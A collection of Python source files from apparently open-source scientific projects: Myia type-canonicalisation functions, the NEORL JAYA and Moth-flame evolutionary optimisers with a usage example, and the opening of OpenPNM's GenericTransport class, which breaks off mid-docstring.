new_node = node.graph.apply(P.tuple_getitem, data, idx_c)
elif node.is_apply(P.record_setitem):
_, data, item, value = node.inputs
idx_c = _record_makeindex(data.abstract, item.value)
new_node = node.graph.apply(P.tuple_setitem, data, idx_c, value)
elif node.is_apply(P.dict_setitem):
_, data, item, value = node.inputs
idx_c = _dict_makeindex(data.abstract, item.value)
new_node = node.graph.apply(P.tuple_setitem, data, idx_c, value)
elif node.is_apply(P.make_record):
mkr, typ, *args = node.inputs
new_node = node.graph.apply(P.make_tuple, *args)
elif node.is_apply(P.make_dict):
mkr, typ, *args = node.inputs
new_node = node.graph.apply(P.make_tuple, *args)
elif node.is_apply(P.partial):
orig_ptl, oper, *args = node.inputs
if oper.is_constant() and oper.value is P.make_record:
if len(args) == 1:
new_node = Constant(P.make_tuple)
elif len(args) > 1:
new_node = node.graph.apply(
P.partial, P.make_tuple, *args[1:]
)
elif node.is_apply(P.hastype):
# hastype(x, type) -> hastag(x, tag)
_, x, typ = node.inputs
real_typ = type_to_abstract(typ.value)
matches, _ = split_type(x.abstract, real_typ)
assert not isinstance(matches, AbstractUnion)
tag = type_to_tag(matches)
new_node = node.graph.apply(P.hastag, x, _mkct(tag))
elif node.is_apply(P.unsafe_static_cast):
# unsafe_static_cast(x, type) -> casttag(x, tag)
# unsafe_static_cast(x, union_type) -> x, if x bigger union type
_, x, typ = node.inputs
assert isinstance(typ.value, AbstractValue)
if isinstance(typ.value, AbstractUnion):
new_node = x
keep_abstract = False
else:
tag = type_to_tag(typ.value)
new_node = node.graph.apply(P.casttag, x, _mkct(tag))
elif node.is_apply(P.tagged):
# tagged(x) -> tagged(x, tag)
# tagged(x, tag) -> unchanged
if len(node.inputs) == 2:
_, x = node.inputs
tag = type_to_tag(x.abstract)
new_node = node.graph.apply(P.tagged, x, _mkct(tag))
elif node.is_apply(P.string_eq):
new_node = node.graph.apply(
P.scalar_eq, node.inputs[1], node.inputs[2]
)
elif node.is_apply(P.make_kwarg):
new_node = node.inputs[2]
elif node.is_apply(P.extract_kwarg):
new_node = node.inputs[2]
elif node.is_constant((str, AbstractValue)):
new_value = to_canonical(node.value, node.abstract)
new_node = Constant(new_value)
new_node.abstract = from_value(new_value)
keep_abstract = False
if new_node is not None:
if keep_abstract:
new_node.abstract = node.abstract
manager.replace(node, new_node)
for graph in manager.graphs:
graph._sig = None
graph._user_graph = None
for node in manager.all_nodes:
if (
node.is_constant()
and node.abstract
and not isinstance(
node.abstract, (AbstractFunctionBase, AbstractExternal),
)
):
node.value = to_canonical(node.value, node.abstract, coerce=True)
node.abstract = _reabs(node.abstract)
########################
# Convert to canonical #
########################
@ovld.dispatch(type_error=MyiaInputTypeError)
def to_canonical(self, arg, orig_t, coerce=False):
"""Check and convert an argument to the canonical representation.
Arguments:
arg: The argument to convert.
orig_t: The type of the argument as returned by to_abstract.
coerce: Whether to allow dtype coercion for numeric scalars.
Returns:
A version of the argument where classes/dicts become tuples
and unions are properly tagged.
"""
if isinstance(arg, BackendValue):
if not typecheck(orig_t, arg.orig_t):
raise MyiaInputTypeError("Bad type for backend value.")
return arg
fn = self[type(arg), type(orig_t), bool]
return fn(arg, orig_t, coerce)
@ovld # noqa: F811
def to_canonical(self, arg: tuple, orig_t: AbstractTuple, coerce):
oe = orig_t.elements
if len(arg) != len(oe):
raise MyiaInputTypeError(f"Expected {len(oe)} elements")
return tuple(self(x, o, coerce) for x, o in zip(arg, oe))
@ovld # noqa: F811
def to_canonical(
self, arg: RandomStateWrapper, orig_t: AbstractRandomState, coerce
):
return arg
@ovld # noqa: F811
def to_canonical(self, arg: dict, orig_t: AbstractDict, coerce):
types = orig_t.entries
if len(arg) != len(types):
raise MyiaInputTypeError(
"Dictionary input doesn't have the expected size"
)
if set(arg.keys()) != set(types.keys()):
raise MyiaInputTypeError("Mismatched keys for input dictionary.")
return tuple(self(arg[k], o, coerce) for k, o in orig_t.entries.items())
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractClassBase, coerce):
if orig_t.tag is Empty:
if arg != []:
raise MyiaInputTypeError(f"Expected empty list")
return ()
elif orig_t.tag is Cons:
if arg == []:
raise MyiaInputTypeError(f"Expected non-empty list")
if not isinstance(arg, list):
raise MyiaInputTypeError(f"Expected list")
ot = orig_t.attributes["head"]
li = list(self(x, ot, coerce) for x in arg)
rval = TaggedValue(type_to_tag(empty), ())
for elem in reversed(li):
rval = TaggedValue(type_to_tag(orig_t), (elem, rval))
return rval.value
else:
if not isinstance(arg, orig_t.tag):
raise MyiaInputTypeError(f"Expected {orig_t.tag.__qualname__}")
arg = tuple(getattr(arg, attr) for attr in orig_t.attributes)
oe = list(orig_t.attributes.values())
res = tuple(self(x, o, coerce) for x, o in zip(arg, oe))
return res
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractArray, coerce):
et = orig_t.element
assert isinstance(et, AbstractScalar)
et = et.xtype()
assert issubclass(et, (xtype.Number, xtype.Bool))
arg = orig_t.xtype().to_numpy(arg)
arg_dtype = xtype.np_dtype_to_type(str(arg.dtype))
if arg_dtype != et:
raise MyiaInputTypeError(
f"Expected array of type {et}, but got {arg_dtype}."
)
shp = orig_t.xshape()
if shp is not ANYTHING and arg.shape != shp:
raise MyiaInputTypeError(
f"Expected array with shape {shp}, but got {arg.shape}."
)
return arg
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractUnion, coerce):
for opt in orig_t.options:
try:
value = self(arg, opt, coerce)
tag = type_to_tag(opt)
except TypeError:
continue
return TaggedValue(tag, value)
else:
opts = ", ".join(map(str, orig_t.options))
raise MyiaInputTypeError(f"Expected one of {opts}, not {arg}")
# @ovld # noqa: F811
# def to_canonical(self, arg, orig_t: AbstractHandle, coerce):
# if not isinstance(arg, HandleInstance):
# raise MyiaInputTypeError(f"Expected handle")
# arg.state = self(arg.state, orig_t.element, coerce)
# return arg
@ovld # noqa: F811
def to_canonical(self, arg: HandleInstance, orig_t: AbstractHandle, coerce):
arg.state = self(arg.state, orig_t.element, coerce)
return arg
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractScalar, coerce):
if not typecheck(orig_t, from_value(arg)):
xt = orig_t.xtype()
if coerce and issubclass(xt, xtype.Number):
# TODO: Actually coerce the arg to the proper dtype instead
# of returning it unchanged.
return arg
else:
raise MyiaInputTypeError(
f"Scalar has wrong type: expected {orig_t}, got {arg}"
)
if issubclass(orig_t.xtype(), xtype.String):
arg = str_to_tag(arg)
return arg
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractType, coerce):
return _reabs(arg)
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractError, coerce):
return _reabs(arg)
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractKeywordArgument, coerce):
return arg
#####################
# Convert to output #
#####################
@ovld
def from_canonical(self, res, orig_t: AbstractClassBase):
"""Convert from the canonical representation to the final output."""
if orig_t.tag in (Empty, Cons):
rval = []
while res:
value = self(res[0], orig_t.attributes["head"])
rval.append(value)
res = res[1].value
return rval
tup = tuple(self(x, o) for x, o in zip(res, orig_t.attributes.values()))
return orig_t.constructor(*tup)
@ovld # noqa: F811
def from_canonical(self, res, orig_t: AbstractDict):
tup = tuple(self(x, o) for x, o in zip(res, orig_t.entries.values()))
return dict(zip(orig_t.entries.keys(), tup))
@ovld # noqa: F811
def from_canonical(self, res, orig_t: AbstractTuple):
return tuple(self(x, o) for x, o in zip(res, orig_t.elements))
@ovld # noqa: F811
def from_canonical(self, res, orig_t: AbstractRandomState):
return res
@ovld # noqa: F811
def from_canonical(self, arg, orig_t: AbstractScalar):
if orig_t.xtype() == xtype.String:
arg = _strmap_tag[arg]
return arg
@ovld # noqa: F811
def from_canonical(self, arg, orig_t: AbstractArray):
return orig_t.xtype().from_numpy(arg)
@ovld # noqa: F811
def from_canonical(self, arg, orig_t: AbstractHandle):
# The state is updated by the pipeline through universe.commit()
return arg
@ovld # noqa: F811
def from_canonical(self, arg, orig_t: AbstractUnion):
for typ in orig_t.options:
tag = type_to_tag(typ)
if tag == arg.tag:
return self(arg.value, typ)
else:
raise AssertionError(f"Badly formed TaggedValue")
__consolidate__ = True
__all__ = [
"from_canonical",
"simplify_types",
"str_to_tag",
"to_canonical",
"type_to_tag",
]
``` |
{
"source": "Jimmy-INL/neorl",
"score": 3
} |
#### File: neorl/evolu/jaya.py
```python
import random
import numpy as np
import joblib
class JAYA:
"""
JAYA algorithm
:param mode: (str) problem type, either "min" for minimization problem or "max" for maximization
:param bounds: (dict) input parameter type and lower/upper bounds in dictionary form. Example: ``bounds={'x1': ['int', 1, 4], 'x2': ['float', 0.1, 0.8], 'x3': ['float', 2.2, 6.2]}``
:param fit: (function) the fitness function
:param npop: (int) number of individuals in the population
:param ncores: (int) number of parallel processors
:param seed: (int) random seed for sampling
"""
def __init__(self, mode, bounds, fit, npop=50, ncores=1, seed=None):
self.seed=seed
if self.seed:
random.seed(self.seed)
np.random.seed(self.seed)
assert npop > 3, '--error: size of npop must be more than 3'
self.npop= npop
self.bounds=bounds
self.ncores=ncores
self.mode=mode
if mode == 'max':
self.fit=fit
elif mode == 'min':
def fitness_wrapper(*args, **kwargs):
return -fit(*args, **kwargs)
self.fit = fitness_wrapper
else:
raise ValueError('--error: The mode entered by user is invalid, use either `min` or `max`')
def gen_indv(self, bounds): # individual
indv = []
for key in bounds:
if bounds[key][0] == 'int':
indv.append(random.randint(bounds[key][1], bounds[key][2]))
elif bounds[key][0] == 'float':
indv.append(random.uniform(bounds[key][1], bounds[key][2]))
elif bounds[key][0] == 'grid':
indv.append(random.sample(bounds[key][1],1)[0])
return indv
def init_population(self, x0=None): # population
pop = []
if x0: # an initial population was provided by the user
print('The first individual provided by the user:', x0[0])
print('The last individual provided by the user:', x0[-1])
for i in range(len(x0)):
pop.append(x0[i])
else: # random init
for i in range(self.npop):
indv=self.gen_indv(self.bounds)
pop.append(indv)
# array
pop = np.array(pop)
return pop
def ensure_bounds(self, vec): # bounds check
vec_new = []
for i, (key, val) in enumerate(self.bounds.items()):
# less than minimum
if vec[i] < self.bounds[key][1]:
vec_new.append(self.bounds[key][1])
# more than maximum
if vec[i] > self.bounds[key][2]:
vec_new.append(self.bounds[key][2])
# fine
if self.bounds[key][1] <= vec[i] <= self.bounds[key][2]:
vec_new.append(vec[i])
return vec_new
def fit_worker(self, x):
fitness = self.fit(x)
return fitness
def evolute(self, ngen, x0=None, verbose=0):
"""
This function evolutes the JAYA algorithm for a number of generations.
:param ngen: (int) number of generations to evolute
:param x0: (list of lists) the initial individuals of the population
:param verbose: (bool) print statistics to screen
:return: (tuple) best individual, best fitness, and list of best fitness values per generation
"""
N = self.npop # population size
dim = len(self.bounds) # individual length
if self.seed:
random.seed(self.seed)
np.random.seed(self.seed)
fitness_mat = np.zeros(N)
Best_pos = np.zeros(dim)
Best_score = float('-inf') # find a maximum, so the larger the better
Worst_pos = np.zeros(dim)
Worst_score = float('inf')
## INITIALIZE
# population
if x0:
assert len(x0) == N, '--error: the length of x0 ({}) (initial population) must equal to number of individuals npop ({})'.format(len(x0), self.npop)
pos = self.init_population(x0=x0)
else:
pos = self.init_population()
# calulate fitness
for i in range(N):
fitness = self.fit_worker(pos[i, :])
fitness_mat[i] = fitness
if fitness > Best_score:
Best_score = fitness
Best_pos = pos[i, :]
if fitness < Worst_score:
Worst_score = fitness
Worst_pos = pos[i, :]
## main loop
best_scores = []
for gen in range(1, ngen+1):
new_pos = np.zeros((N,dim))
# update pos
for i in range(N):
r1=np.random.random(dim)
r2=np.random.random(dim)
# Update pos
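# JAYA rule (as implemented below): attract toward the best solution and
# repel from the worst one,
# X_new = X + r1*(X_best - |X|) - r2*(X_worst - |X|)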
new_pos[i,:] = (
pos[i,:]
+ r1*(Best_pos - abs(pos[i,:]))
- r2*(Worst_pos - abs(pos[i,:])) # repel from the worst (note the minus sign)
)
# check bounds
new_pos[i,:] = self.ensure_bounds(new_pos[i,:])
if self.ncores > 1:
with joblib.Parallel(n_jobs=self.ncores) as parallel:
fitness_new = parallel(joblib.delayed(self.fit_worker)(item) for item in new_pos)
for i in range(N):
if fitness_new[i] > fitness_mat[i]:
pos[i,:] = new_pos[i,:]
fitness_mat[i] = fitness_new[i]
else:
for i in range(N):
# replace current element with new element if it has better fitness
fitness_temp = self.fit_worker(new_pos[i,:])
if fitness_temp > fitness_mat[i]: # better than the old
pos[i,:] = new_pos[i,:]
fitness_mat[i] = fitness_temp
# update best_score and worst_score
for i in range(N):
# new_pos[i,:] = self.ensure_bounds(new_pos[i,:])
if fitness_mat[i] > Best_score:
Best_score = fitness_mat[i]
Best_pos = pos[i, :]
if fitness_mat[i] < Worst_score:
Worst_score = fitness_mat[i]
Worst_pos = pos[i, :]
#-----------------------------
#Fitness saving
#-----------------------------
gen_avg = sum(fitness_mat) / N # current generation avg. fitness
y_best = Best_score # fitness of best individual
x_best = Best_pos # position of the best flame
best_scores.append(y_best)
#--mir show the value wrt min/max
if self.mode=='min':
y_best_correct=-y_best
else:
y_best_correct=y_best
if verbose:
print('************************************************************')
print('JAYA step {}/{}, Ncores={}'.format(gen*self.npop, ngen*self.npop, self.ncores))
print('************************************************************')
print('Best fitness:', np.round(y_best_correct,6))
print('Best individual:', x_best)
print('Average fitness:', np.round(gen_avg,6))
print('************************************************************')
if verbose:
print('------------------------ JAYA Summary --------------------------')
print('Best fitness (y) found:', y_best_correct)
print('Best individual (x) found:', x_best)
print('--------------------------------------------------------------')
if self.mode=='min':
best_scores=[-item for item in best_scores]
return x_best, y_best_correct, best_scores
```
#### File: neorl/evolu/mfo.py
```python
import random
import numpy as np
import math
import joblib
class MFO:
"""
Moth-flame Optimization (MFO)
:param mode: (str) problem type, either "min" for minimization problem or "max" for maximization
:param bounds: (dict) input parameter type and lower/upper bounds in dictionary form. Example: ``bounds={'x1': ['int', 1, 4], 'x2': ['float', 0.1, 0.8], 'x3': ['float', 2.2, 6.2]}``
:param fit: (function) the fitness function
:param nmoths: (int) number of moths in the population
:param b: (float) constant for defining the shape of the logarithmic spiral
:param ncores: (int) number of parallel processors
:param seed: (int) random seed for sampling
"""
def __init__(self, mode, bounds, fit, nmoths=50, b=1, ncores=1, seed=None):
self.seed=seed
if self.seed:
random.seed(self.seed)
np.random.seed(self.seed)
assert nmoths > 3, '--error: size of nmoths must be more than 3'
self.npop= nmoths
self.bounds=bounds
self.ncores=ncores
self.b=b
self.mode=mode
if mode == 'min':
self.fit=fit
elif mode == 'max':
def fitness_wrapper(*args, **kwargs):
return -fit(*args, **kwargs)
self.fit = fitness_wrapper
else:
raise ValueError('--error: The mode entered by user is invalid, use either `min` or `max`')
def gen_indv(self, bounds): # individual
indv = []
for key in bounds:
if bounds[key][0] == 'int':
indv.append(random.randint(bounds[key][1], bounds[key][2]))
elif bounds[key][0] == 'float':
indv.append(random.uniform(bounds[key][1], bounds[key][2]))
elif bounds[key][0] == 'grid':
indv.append(random.sample(bounds[key][1],1)[0])
return indv
def init_population(self, x0=None): # population
pop = []
if x0: # initial population provided by the user
print('The first individual provided by the user:', x0[0])
print('The last individual provided by the user:', x0[-1])
for i in range(len(x0)):
pop.append(x0[i])
else: # random init
for i in range(self.npop):
indv=self.gen_indv(self.bounds)
pop.append(indv)
# array
pop = np.array(pop)
return pop
def ensure_bounds(self, vec): # bounds check
vec_new = []
for i, (key, val) in enumerate(self.bounds.items()):
# less than minimum
if vec[i] < self.bounds[key][1]:
vec_new.append(self.bounds[key][1])
# more than maximum
if vec[i] > self.bounds[key][2]:
vec_new.append(self.bounds[key][2])
# fine
if self.bounds[key][1] <= vec[i] <= self.bounds[key][2]:
vec_new.append(vec[i])
return vec_new
def fit_worker(self, x):
xchecked=self.ensure_bounds(x)
fitness = self.fit(xchecked)
return fitness
def evolute(self, ngen, x0=None, verbose=0):
"""
This function evolutes the MFO algorithm for number of generations.
:param ngen: (int) number of generations to evolute
:param x0: (list of lists) the initial individuals of the population
:param verbose: (bool) print statistics to screen
:return: (dict) dictionary containing major MFO search results
"""
self.history = {'local_fitness':[], 'global_fitness':[], 'r': []}
self.best_fitness=float("inf")
N = self.npop # population size
dim = len(self.bounds) # individual length
if self.seed:
random.seed(self.seed)
np.random.seed(self.seed)
## INITIALIZE
# moths
if x0:
assert len(x0) == N, '--error: the length of x0 ({}) (initial population) must equal the number of individuals npop ({})'.format(len(x0), self.npop)
Moth_pos = self.init_population(x0=x0)
else:
Moth_pos = self.init_population()
Moth_fitness = np.full(N, float('inf')) # set as worst result
# sort moths
sorted_population = np.copy(Moth_pos)
fitness_sorted = np.zeros(N)
# flames
best_flames = np.copy(Moth_pos)
best_flame_fitness = np.zeros(N)
# moths+flames
double_population = np.zeros((2 * N, dim))
double_fitness = np.zeros(2 * N)
double_sorted_population = np.zeros((2*N, dim))
double_fitness_sorted = np.zeros(2*N)
# previous generation
previous_population = np.zeros((N, dim))
previous_fitness = np.zeros(N)
## main loop
best_scores = []
for gen in range(1, ngen+1):
Flame_no = round(N - gen*((N-1) / (ngen+1)))
if self.ncores > 1:
with joblib.Parallel(n_jobs=self.ncores) as parallel:
Moth_fitness=parallel(joblib.delayed(self.fit_worker)(indv) for indv in Moth_pos) # 2d list
Moth_pos = np.array(Moth_pos)
Moth_fitness = np.array(Moth_fitness)
else:
for i in range(N):
Moth_fitness[i] = self.fit_worker(Moth_pos[i,:])
if gen == 1: # number of flames (OF) equals number of moths (OM)
# sort the moths
fitness_sorted = np.sort(Moth_fitness) # default: (small -> large)
#fitness_sorted = -(np.sort(-np.array(Moth_fitness))) # descend (large -> small)
I = np.argsort(np.array(Moth_fitness)) # index of sorted list
sorted_population = Moth_pos[I, :]
# update flames
best_flames = sorted_population
best_flame_fitness = fitness_sorted
else: # the number of flames may exceed the number of moths
double_population = np.concatenate((previous_population, best_flames), axis=0)
double_fitness = np.concatenate((previous_fitness, best_flame_fitness), axis=0)
double_fitness_sorted = np.sort(double_fitness)
I2 = np.argsort(double_fitness)
double_sorted_population = double_population[I2, :]
fitness_sorted = double_fitness_sorted[0:N]
sorted_population = double_sorted_population[0:N, :]
best_flames = sorted_population
best_flame_fitness = fitness_sorted
# record the best flame so far
Best_flame_score = fitness_sorted[0]
Best_flame_pos = sorted_population[0, :]
# previous
previous_population = np.copy(Moth_pos) # without np.copy(), later changes to Moth_pos would also change previous_population
previous_fitness = np.copy(Moth_fitness) # the same applies to the fitness array returned by joblib
# r linearly decreases from -1 to -2 to calculate t in Eq. (3.12)
r = -1 + gen * ((-1) / ngen)
# update moth position
for i in range(0, N):
for j in range(0,dim):
if i <= Flame_no:
distance_to_flame = abs(sorted_population[i,j]-Moth_pos[i,j])
t = (r-1)*random.random()+1
# eq. (3.12)
Moth_pos[i,j] = (
distance_to_flame*math.exp(self.b*t)*math.cos(t*2*math.pi)
+ sorted_population[i,j]
)
if i > Flame_no:
distance_to_flame = abs(sorted_population[Flame_no,j]-Moth_pos[i,j])
t = (r-1)*random.random()+1
# redundant moths all fly to the last flame (index Flame_no)
Moth_pos[i,j] = (
distance_to_flame*math.exp(self.b*t)*math.cos(t*2*math.pi)
+ sorted_population[Flame_no,j]
)
#-----------------------------
#Fitness saving
#-----------------------------
gen_avg = sum(best_flame_fitness) / len(best_flame_fitness) # current generation avg. fitness
y_local_best = Best_flame_score # fitness of best individual
x_local_best = Best_flame_pos # position of the best flame
for i, fits in enumerate(fitness_sorted):
#save the best of the best!!!
if fits < self.best_fitness:
self.best_fitness=fits
self.best_position=sorted_population[i, :].copy()
#--mir
if self.mode=='max':
self.fitness_best_correct=-self.best_fitness
self.local_fitness=-Best_flame_score
else:
self.fitness_best_correct=self.best_fitness
self.local_fitness=Best_flame_score
self.history['local_fitness'].append(self.local_fitness)
self.history['global_fitness'].append(self.fitness_best_correct)
self.history['r'].append(r)
if verbose:
print('************************************************************')
print('MFO step {}/{}, Ncores={}'.format(gen*self.npop, ngen*self.npop, self.ncores))
print('************************************************************')
print('Best fitness:', np.round(self.fitness_best_correct,6))
print('Best individual:', self.best_position)
print('Average fitness:', np.round(gen_avg,6))
print('************************************************************')
if verbose:
print('------------------------ MFO Summary --------------------------')
print('Best fitness (y) found:', self.fitness_best_correct)
print('Best individual (x) found:', self.best_position)
print('--------------------------------------------------------------')
return self.best_position, self.fitness_best_correct, self.history
``` |
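A short usage sketch of the ``MFO`` class defined above; the import path is inferred from the file header and the objective, bounds, and settings are illustrative.
```python
from neorl.evolu.mfo import MFO  # import path inferred from the file header above

def sphere(x):
    # simple objective to minimize
    return sum(xi**2 for xi in x)

bounds = {'x1': ['float', -5.0, 5.0],
          'x2': ['float', -5.0, 5.0],
          'x3': ['int', -5, 5]}

mfo = MFO(mode='min', bounds=bounds, fit=sphere, nmoths=20, b=1, ncores=1, seed=1)
best_x, best_y, history = mfo.evolute(ngen=30, verbose=0)
print('best x:', best_x)
print('best y:', best_y)
print('final r:', history['r'][-1])  # r decreases from -1 towards -2 over the run
```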
{
"source": "Jimmy-INL/OpenPNM",
"score": 2
} |
#### File: openpnm/algorithms/GenericTransport.py
```python
import numpy as np
import openpnm as op
import scipy.sparse.linalg
from numpy.linalg import norm
import scipy.sparse.csgraph as spgr
from scipy.spatial import ConvexHull
from scipy.spatial import cKDTree
from openpnm.topotools import iscoplanar
from openpnm.algorithms import GenericAlgorithm
from openpnm.utils import logging, Docorator, GenericSettings
# Uncomment this line when we stop supporting Python 3.6
# from dataclasses import dataclass, field
# from typing import List
docstr = Docorator()
logger = logging.getLogger(__name__)
@docstr.get_sectionsf('GenericTransportSettings',
sections=['Parameters', 'Other Parameters'])
@docstr.dedent
# Uncomment this line when we stop supporting Python 3.6
# @dataclass
class GenericTransportSettings(GenericSettings):
r"""
Defines the settings for GenericTransport algorithms
Parameters
----------
phase : (str)
The name of the phase on which the algorithm acts
quantity : (str)
The name of the physical quantity to be calculated
conductance : (str)
The name of the pore-scale transport conductance values. These are
typically calculated by a model attached to a *Physics* object
associated with the given *Phase*.
Other Parameters
----------------
solver_family : str (default = 'scipy')
The solver package to use. OpenPNM currently supports ``scipy``,
``pyamg`` and ``petsc`` (if you have it installed).
solver_type : str
The specific solver to use. For instance, if ``solver_family`` is
``scipy`` then you can specify any of the iterative solvers such as
``cg`` or ``gmres``. [More info here]
(https://docs.scipy.org/doc/scipy/reference/sparse.linalg.html),
solver_preconditioner : str (default = ``jacobi``)
This is used by the PETSc solver to specify which preconditioner to
use.
solver_tol : float (default = 1e-6)
Used to control the accuracy to which the iterative solver aims to
achieve before stopping.
solver_atol : float
Absolute tolerance for iterative solvers, defined such that the solver
stops once ``norm(A*x - b) <= atol``. If ``None``, it is computed from
``solver_tol`` (see ``_get_atol``).
solver_rtol : float
Relative tolerance for iterative solvers, i.e. the desired reduction of
the residual relative to its value at the initial guess. If ``None``, it
is computed from ``solver_tol`` (see ``_get_rtol``).
solver_maxiter : int (default = 5000)
Limits the number of iterations to attempt before quitting when aiming
for the specified tolerance. The default is 5000.
variable_props : list
Names of properties that change during the simulation and must be
re-evaluated between iterations (used by iterative subclasses).
cache_A : bool
If ``True`` (default), the clean coefficient matrix **A** is cached and
reused instead of being rebuilt on every run.
cache_b : bool
If ``True`` (default), the clean RHS vector **b** is cached and reused
instead of being rebuilt on every run.
"""
phase = None
conductance = None
quantity = None
solver_family = 'scipy'
solver_type = 'spsolve'
solver_preconditioner = 'jacobi'
solver_tol = 1e-8
solver_atol = None
solver_rtol = None
solver_maxiter = 5000
cache_A = True
cache_b = True
@docstr.get_sectionsf('GenericTransport', sections=['Parameters'])
@docstr.dedent
class GenericTransport(GenericAlgorithm):
r"""
This class implements steady-state linear transport calculations
Parameters
----------
%(GenericAlgorithm.parameters)s
Notes
-----
The following table shows the methods that are accessible to the user
for setting up the simulation.
+---------------------+---------------------------------------------------+
| Methods | Description |
+=====================+===================================================+
| ``set_value_BC`` | Applies constant value boundary conditions to the |
| | specified pores |
+---------------------+---------------------------------------------------+
| ``set_rate_BC`` | Applies constant rate boundary conditions to the |
| | specified pores |
+---------------------+---------------------------------------------------+
| ``remove_BC`` | Removes all boundary conditions from the |
| | specified pores |
+---------------------+---------------------------------------------------+
| ``rate`` | Calculates the total rate of transfer through the |
| | given pores or throats |
+---------------------+---------------------------------------------------+
| ``setup`` | A shortcut for applying values in the ``settings``|
| | attribute. |
+---------------------+---------------------------------------------------+
| ``results``         | Returns the results of the calculation as a     |
| | ``dict`` with the data stored under the 'quantity'|
| | specified in the ``settings`` |
+---------------------+---------------------------------------------------+
In addition to the above methods there are also the following attributes:
+---------------------+---------------------------------------------------+
| Attribute | Description |
+=====================+===================================================+
| ``A`` | Retrieves the coefficient matrix |
+---------------------+---------------------------------------------------+
| ``b`` | Retrieves the RHS matrix |
+---------------------+---------------------------------------------------+
This class contains quite a few hidden methods (preceded by an
underscore) that are called internally. Since these are critical to the
functioning of this algorithm they are worth outlining even though the
user does not call them directly:
+-----------------------+-------------------------------------------------+
| Method or Attribute | Description |
+=======================+=================================================+
| ``_build_A`` | Builds the **A** matrix based on the |
| | 'conductance' specified in ``settings`` |
+-----------------------+-------------------------------------------------+
| ``_build_b`` | Builds the **b** matrix |
+-----------------------+-------------------------------------------------+
| ``_apply_BCs``        | Applies the given BCs by adjusting **A** and    |
| | **b** matrices |
+-----------------------+-------------------------------------------------+
| ``_calc_eff_prop`` | Finds the effective property (e.g. permeability |
| | coefficient) based on the given BCs |
+-----------------------+-------------------------------------------------+
| ``_solve`` | Runs the algorithm using the solver specified |
| | in the ``settings`` |
+-----------------------+-------------------------------------------------+
| ``_get_domain_area`` | Attempts to estimate the area of the inlet pores|
| | if not specified by user |
+-----------------------+-------------------------------------------------+
| ``_get_domain_length``| Attempts to estimate the length between the |
| | inlet and outlet faces if not specified by the |
| | user |
+-----------------------+-------------------------------------------------+
"""
def __init__(self, project=None, network=None, phase=None, settings={},
**kwargs):
# Apply default settings
self.settings._update_settings_and_docs(GenericTransportSettings)
# Overwrite any given in init
self.settings.update(settings)
# Assign phase if given during init
self.setup(phase=phase)
# If network given, get project, otherwise let parent class create it
if network is not None:
project = network.project
super().__init__(project=project, **kwargs)
# Create some instance attributes
self._A = self._pure_A = None
self._b = self._pure_b = None
self['pore.bc_rate'] = np.nan
self['pore.bc_value'] = np.nan
@docstr.get_sectionsf('GenericTransport.setup',
sections=['Parameters'])
@docstr.dedent
def setup(self, phase=None, quantity='', conductance='', **kwargs):
r"""
Parameters
----------
%(GenericTransportSettings.parameters)s
"""
if phase:
self.settings['phase'] = phase.name
if quantity:
self.settings['quantity'] = quantity
if conductance:
self.settings['conductance'] = conductance
self.settings.update(**kwargs)
@docstr.get_full_descriptionf(base='GenericTransport.reset')
@docstr.get_sectionsf(base='GenericTransport.reset',
sections=['Parameters'])
@docstr.dedent
def reset(self, bcs=False, results=True):
r"""
Resets the algorithm to enable re-use.
This allows the reuse of an algorithm inside a for-loop for parametric
studies. The default behavior means that only ``alg.reset()`` and
``alg.run()`` must be called inside a loop. To reset the algorithm
more completely requires overriding the default arguments.
Parameters
----------
results : boolean
If ``True`` (default) all previously calculated values pertaining
to results of the algorithm are removed.
bcs : boolean (default = ``False``)
If ``True`` all previous boundary conditions are removed.
"""
self._pure_b = None
self._b = None
self._pure_A = None
self._A = None
if bcs:
self['pore.bc_value'] = np.nan
self['pore.bc_rate'] = np.nan
if results:
self.pop(self.settings['quantity'], None)
@docstr.dedent
def set_value_BC(self, pores, values, mode='merge'):
r"""
Apply constant value boundary conditions to the specified locations.
These are sometimes referred to as Dirichlet conditions.
Parameters
----------
pores : array_like
The pore indices where the condition should be applied
values : scalar or array_like
The value to apply in each pore. If a scalar is supplied
it is assigned to all locations, and if a vector is supplied it
must be the same size as the indices given in ``pores``.
mode : string, optional
Controls how the boundary conditions are applied. Options are:
+-------------+--------------------------------------------------+
| 'merge' | (Default) Adds supplied boundary conditions to |
| | already existing conditions |
+-------------+--------------------------------------------------+
| 'overwrite' | Deletes all boundary condition on object then |
| | adds the given ones |
+-------------+--------------------------------------------------+
Notes
-----
The definition of ``quantity`` is specified in the algorithm's
``settings``, e.g. ``alg.settings['quantity'] = 'pore.pressure'``.
"""
mode = self._parse_mode(mode, allowed=['merge', 'overwrite'],
single=True)
self._set_BC(pores=pores, bctype='value', bcvalues=values,
mode=mode)
def set_rate_BC(self, pores, values, mode='merge'):
r"""
Apply constant rate boundary conditions to the specified locations.
This is similar to a Neumann boundary condition, but is
slightly different since it's the conductance multiplied by the
gradient, while Neumann conditions specify just the gradient.
Parameters
----------
pores : array_like
The pore indices where the condition should be applied
values : scalar or array_like
The values of rate to apply in each pore. If a scalar is supplied
it is assigned to all locations, and if a vector is applied it
must be the same size as the indices given in ``pores``.
mode : string, optional
Controls how the boundary conditions are applied. Options are:
+-------------+--------------------------------------------------+
| 'merge' | (Default) Adds supplied boundary conditions to |
| | already existing conditions |
+-------------+--------------------------------------------------+
| 'overwrite' | Deletes all boundary condition on object then |
| | adds the given ones |
+-------------+--------------------------------------------------+
Notes
-----
The definition of ``quantity`` is specified in the algorithm's
``settings``, e.g. ``alg.settings['quantity'] = 'pore.pressure'``.
"""
mode = self._parse_mode(mode, allowed=['merge', 'overwrite'],
single=True)
self._set_BC(pores=pores, bctype='rate', bcvalues=values, mode=mode)
@docstr.get_sectionsf(base='GenericTransport._set_BC',
sections=['Parameters', 'Notes'])
def _set_BC(self, pores, bctype, bcvalues=None, mode='merge'):
r"""
This private method is called by public facing BC methods, to apply
boundary conditions to specified pores
Parameters
----------
pores : array_like
The pores where the boundary conditions should be applied
bctype : string
Specifies the type or the name of boundary condition to apply. The
types can be one of the following:
+-------------+--------------------------------------------------+
| 'value' | Specify the value of the quantity in each |
| | location |
+-------------+--------------------------------------------------+
| 'rate' | Specify the flow rate into each location |
